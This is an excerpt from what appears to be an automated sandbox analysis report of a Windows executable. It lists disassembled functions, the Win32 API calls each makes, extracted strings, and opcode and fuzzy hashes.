                                                                                                                        • SendMessageA.USER32(?,00000121,00000000,?), ref: 00438865
                                                                                                                        • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 0043887F
                                                                                                                        • UpdateWindow.USER32(?), ref: 004388C5
                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004388F9
                                                                                                                          • Part of subcall function 00437534: GetWindowLongA.USER32(?,000000F0), ref: 0043753F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2853195852-0
                                                                                                                        • Opcode ID: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                        • Instruction ID: 084587f8be8d29286b758f10d7e9662302e5aba9923b57fea7a2f2edceff8d6b
                                                                                                                        • Opcode Fuzzy Hash: b13282f9b8ac6db00a8496b55bdebc49f6485c126065f6b24774a09cd2d7802b
                                                                                                                        • Instruction Fuzzy Hash: 3E410330208741AFDB25AF26DC44A2BFAF0FFC9B44F50192EF581911A1CB3AC905CA5A
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82), ref: 004434A2
                                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 004434C0
                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83), ref: 0044351C
                                                                                                                        • LocalReAlloc.KERNEL32(?,?,00000002,00000010,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66), ref: 0044352E
                                                                                                                        • LeaveCriticalSection.KERNEL32(0047EB28,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044353B
                                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 0044356B
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0044370A,?,00000000,?,?,?,?,00442F66,00441F83,00442F82,0043538D), ref: 0044358C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 784703316-0
                                                                                                                        • Opcode ID: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                        • Instruction ID: c920ea616b6941ccf4a41ae28c234557be8e43c86538256f6915913f71204ac3
                                                                                                                        • Opcode Fuzzy Hash: eec5c9af0761aab35826935f94150f19e31b1a8781ee2cce32ef685509deae95
                                                                                                                        • Instruction Fuzzy Hash: 2F31ABB1500615BFEB24EF55D885C6ABBA8FB057117108A2EE81683610CB34FE50CB99
                                                                                                                        APIs
                                                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00422D73
                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00422D8B
                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 00422D92
                                                                                                                        • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00422DB8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                                                                        • String ID: B$DISPLAY
                                                                                                                        • API String ID: 2307409384-3316187204
                                                                                                                        • Opcode ID: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                        • Instruction ID: 3a1a5f33e973a52794829ba86540b2c4864c641d0816d9ff10fb2a82ff3ca36e
                                                                                                                        • Opcode Fuzzy Hash: 9cba5b6c645de5270ad7bb0fc0d991fcef33e3317d4237bbf04082c5b1e7876e
                                                                                                                        • Instruction Fuzzy Hash: 6111A371710334BBCF119F64AD8475BBBA9FF06B50B808466FD05AA145C2F4D801CBA9
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                          • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                          • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                          • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                          • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                        • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryLibraryLoadProc$PathSystemTempWindows
                                                                                                                        • String ID: %s\%s$CopyFileExA$KERNEL32.DLL$regsvr32.exe
                                                                                                                        • API String ID: 497994091-3394410207
                                                                                                                        • Opcode ID: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                        • Instruction ID: dbb7616a5e8e18c7340fb9c6e1b10d6890d2dd053081ddfc01aae21a589600a4
                                                                                                                        • Opcode Fuzzy Hash: f1068f767d1700a680734e17c4b62072ec67806eae000909974e6ca04aa6b552
                                                                                                                        • Instruction Fuzzy Hash: 6B112570108340AFD318DF54DC06BDA7BA4E745B15F400A2EB595932D2EB7C5144CB5A
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,0043D1B4,?,?,?,?,774D0A60,00000000,?,00425801,00000000), ref: 00443AF5
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,00425801,00000000), ref: 00443AFD
                                                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,00425801,00000000), ref: 00443B48
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00443B58
                                                                                                                          • Part of subcall function 0044399E: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?), ref: 004439DF
                                                                                                                          • Part of subcall function 0044399E: PathFindExtensionA.SHLWAPI(?), ref: 004439F9
                                                                                                                          • Part of subcall function 0044399E: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 00443A93
                                                                                                                          • Part of subcall function 0044399E: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 00443AC0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                                                        • API String ID: 4004864024-597752486
                                                                                                                        • Opcode ID: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                        • Instruction ID: dbd96a4b6eaa2b3b5d1619ca9b628c41ce02e38444e38533f865fee5f1778688
                                                                                                                        • Opcode Fuzzy Hash: eced104bb2dd26ae009b150a134447d401b323aa7f3da8792df851434d666933
                                                                                                                        • Instruction Fuzzy Hash: BE018B74A003515FE710AF25D849B0E3BE8AF44B05F0684AFF448C7262DB78D945CB6E
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004318D6: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00431948
                                                                                                                        • __allrem.LIBCMT ref: 004295EA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042960B
                                                                                                                        • __allrem.LIBCMT ref: 00429627
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042964A
                                                                                                                        • __allrem.LIBCMT ref: 00429666
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429689
                                                                                                                          • Part of subcall function 0042DE95: __lock.LIBCMT ref: 0042DEA3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1282128132-0
                                                                                                                        • Opcode ID: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                        • Instruction ID: 20045b1a01943ce18175a09da68eb3b3dac957ec16cd292ee12873f349e9aca1
                                                                                                                        • Opcode Fuzzy Hash: 2b8efb0c4cd6615b4bf4a7a735cd704fbe2f32d7777add60ba098c4bbfda7f1b
                                                                                                                        • Instruction Fuzzy Hash: B861E171B00215AFDB28CF69E88096EBBF5FB44314F64812FE055D3291E738AE85CB18
                                                                                                                        APIs
                                                                                                                        • GetStringTypeW.KERNEL32(00000001,0044D18C,00000001,?,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C3D4
                                                                                                                        • GetLastError.KERNEL32(?,?,0042C39D,?,?,00000008,?,?,00424C62,?,?,?,?,00402BBF), ref: 0042C3E6
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0044D190,0000001C,0042CD7C,00000001,?,00000001,?,?,?,00000001), ref: 0042C448
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,?,00000000), ref: 0042C4C6
                                                                                                                        • GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 0042C4D8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3581945363-0
                                                                                                                        • Opcode ID: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                        • Instruction ID: 88f62cd8e99c40129225232f1d9a33b4d453174d8dbd23392fe9350ab2a232bf
                                                                                                                        • Opcode Fuzzy Hash: 690c7f7e2a6415bf22f53cae1791a707fe08a0ab16c1c026983f3b201c6f3da1
                                                                                                                        • Instruction Fuzzy Hash: 48410471A00234ABCB229F50EC85AEF3B74FF49B54F60451AF800A7250D738DD91CB98
                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0043EA91
                                                                                                                        • GetParent.USER32(?), ref: 0043EA9F
                                                                                                                        • GetParent.USER32(?), ref: 0043EAB2
                                                                                                                        • GetLastActivePopup.USER32(?), ref: 0043EAC1
                                                                                                                        • IsWindowEnabled.USER32(?), ref: 0043EAD6
                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 0043EAE9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 670545878-0
                                                                                                                        • Opcode ID: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                        • Instruction ID: b535a82bad788ac16eb99c34fc1ef6d385c7c7cd006b6a644f81288a5402ee46
                                                                                                                        • Opcode Fuzzy Hash: da300db30e8049e3ec1625432519c923677dbe9daae775b9aee8c1666cefe3f9
                                                                                                                        • Instruction Fuzzy Hash: 451191326073316796317BAB9C4472BA6987F6EB61F161126EC04E3384DB68CC02469E
                                                                                                                        APIs
                                                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 0041AF78
                                                                                                                        • GetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AF90
                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 0041AFA4
                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041AFB4
                                                                                                                        • SetFileTime.KERNEL32(00000000,?,?,?), ref: 0041AFC8
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041AFCF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileTime$CloseCreateDateHandleLocal
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3223929235-0
                                                                                                                        • Opcode ID: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                        • Instruction ID: 3d40798e3b81d1430aab252964cec3372e3fcf11f7589a68c7364f8788f44102
                                                                                                                        • Opcode Fuzzy Hash: 289a22b9c0c4734f6dc7b2019d8550f4d5a2ef4f98a2c5b37f485c35ec0a9aa1
                                                                                                                        • Instruction Fuzzy Hash: 3F014F76204302BFD704EF64DD49F9B77ACFF8A704F008918F645D6090E6B0A6098BAA
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 00419247
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00419257
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: %s\Support\$%s\filelist.txt$Cleanup
                                                                                                                        • API String ID: 1611563598-1950755567
                                                                                                                        • Opcode ID: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                        • Instruction ID: bed570faa51ef1bb4b8ee522f0adb72f7e314e0fe85be6cbe2c67c94b7ad8b4a
                                                                                                                        • Opcode Fuzzy Hash: ee110e23e56ea5e3512cdd37e5712b00be880ddb09ff6c44dc3f432a7db78bd4
                                                                                                                        • Instruction Fuzzy Hash: 74512570304704ABD310EF658851BEFB7E5AFC9B08F40490EF54957282DF38A9498BAE
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalLocklstrlen
                                                                                                                        • String ID: System
                                                                                                                        • API String ID: 1144527523-3470857405
                                                                                                                        • Opcode ID: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                        • Instruction ID: eea6c33846d3fd7b44d8b3261e131be6795de2e39f67e8c264ccda5b0592d447
                                                                                                                        • Opcode Fuzzy Hash: cf0ec0ccca7ebb9e06f2bad1568c3fb91d6ddb1b9ca79714ce062c2dd4892274
                                                                                                                        • Instruction Fuzzy Hash: B441DE32900219EFCB10DFB9C88699EBBB8FF08314F10922AE916D7241DB389945CF94
                                                                                                                        APIs
                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00416C83
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416C93
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?), ref: 00416CF4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: DEBUG$DirectX Reports Reboot Required
                                                                                                                        • API String ID: 1611563598-3080797097
                                                                                                                        • Opcode ID: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                        • Instruction ID: b7ca4d720214f3a145d37d4fa28bcfc633ca5049e0a52a545d8ad53e3cccdc6a
                                                                                                                        • Opcode Fuzzy Hash: b2194924fa359db824beff28826ac9d5e50a418adaf161a9184b89560ac98817
                                                                                                                        • Instruction Fuzzy Hash: 6C110C713803415BD3205728DC41BE77794DB56715F06041BF9D5572C1DABAD4C4C2BA
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll), ref: 004248CA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004248DA
                                                                                                                        • ExitProcess.KERNEL32 ref: 004248EE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 75539706-1276376045
                                                                                                                        • Opcode ID: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                        • Instruction ID: 1eadc9780b94b6718706bd16444dc68ece41e54e59adc106cdd0224a4c3c19fa
                                                                                                                        • Opcode Fuzzy Hash: 6b24fa057879b27e84c07b851d12f55b6a5d25cb9880573ffe5691b15abb3787
                                                                                                                        • Instruction Fuzzy Hash: DAD0C778351341BBD7103F70DD5AE2A7654EF42F0670504357805D0061CB38C900ED2A
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00424291,?), ref: 0042A4C5
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A543
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A5A8
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000001), ref: 0042A5CC
                                                                                                                        • InterlockedExchange.KERNEL32(00480B80,00000000), ref: 0042A62C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558314916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558361105.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558381417.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558395220.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558428438.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558480170.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558503817.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558520357.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558550742.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558572060.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558712546.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558744777.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558771904.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558792384.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558817158.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2947987494-0
                                                                                                                        • Opcode ID: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                        • Instruction ID: dd5010c10e1d9b9ba543a85cf015812fd413b34cf2729769e49068ff06a4fc39
                                                                                                                        • Opcode Fuzzy Hash: 0297ce39435e4b8cf295999e0ec9787d67faa8cead9ee7d4ded0a95dc7049a43
                                                                                                                        • Instruction Fuzzy Hash: FE5107307106219FCB248B58E98472B73A0EB91758FA9856BDC4187291D378EC96874F
                                                                                                                        APIs
                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 0042D553
                                                                                                                        • GetFileType.KERNEL32(?), ref: 0042D5FD
                                                                                                                        • GetStdHandle.KERNEL32(-000000F6), ref: 0042D67E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileHandleInfoStartupType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2461013171-0
                                                                                                                        • Opcode ID: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                        • Instruction ID: 44458137fe5f849726c5f7ea3ed5670e5a8521186f189f810873b1cd4ff4ad7e
                                                                                                                        • Opcode Fuzzy Hash: 0b4af883c50a95dcf51d24fd18dda45df69003270a224a9e762e8201fdac76db
                                                                                                                        • Instruction Fuzzy Hash: BA51C571A043118FD720CF28E84476B77E4FB16328F558A2ED5AAC72E1DB78D849C719
                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,?), ref: 0042F0C8
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,00000000), ref: 0042F129
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 626452242-0
                                                                                                                        • Opcode ID: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
                                                                                                                        • Instruction ID: 9f89b8dcf7f770c9608733cc378f38016b5008aa602b2969820ed4e513d82528
                                                                                                                        • Opcode Fuzzy Hash: 1b18a38131ce7fce63ae30e6e84db181954860e2b4c12b5ea27fecefa44c3926
                                                                                                                        • Instruction Fuzzy Hash: 9E51BE71A0016AAF8F20DF64EC808BFB7B9FB45304BD5853FEA1183252D7359D498B59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                        • Instruction ID: caa39dc95d6f33b0c3bcdbfead75a80356606b39845c86f44a5aa7fea5f7728a
                                                                                                                        • Opcode Fuzzy Hash: 118dc5757c2c4c7984d9873d44fd404751a60e15956d8b869370170dd54cf642
                                                                                                                        • Instruction Fuzzy Hash: FB41E3B1E021769B8F20BF65BC844AF7A74EA02728790412FF914A6251EB3C4D40CB9D
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EED4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000,00000000,00000000), ref: 0042EEDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,V^B,V^B,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000,00425E56,00000000), ref: 0042EF33
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,V^B,000000FF,00000000,00000000,00000000,00000000,?,?,?,0042EF91,?,00000000,00000000,00000000), ref: 0042EF5A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1558837724.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                        • String ID: V^B
                                                                                                                        • API String ID: 1717984340-731569014
                                                                                                                        • Opcode ID: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                        • Instruction ID: 43b45739b5ed72f5805475e1443a07ab786b8dc6a3ef61d40b9e5f9b077d0ce1
                                                                                                                        • Opcode Fuzzy Hash: 8cb481713cc4cd55ac97c91bae78a6b5e8eb1afb9d0bac2b8ca7cde3352df9ed
                                                                                                                        • Instruction Fuzzy Hash: F8313830300239FFCB118F26EE80A6B7BA5FF06760FA64556F520962A0C3368C50C7A9
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 0042688E
                                                                                                                          • Part of subcall function 00429838: EnterCriticalSection.KERNEL32(?,?,?,00423F79,00000004,0044C938,0000000C,00423FDD,000000E0,00424008,?,004369E6,?,?,?,00443BF8), ref: 00429860
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1558328715.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
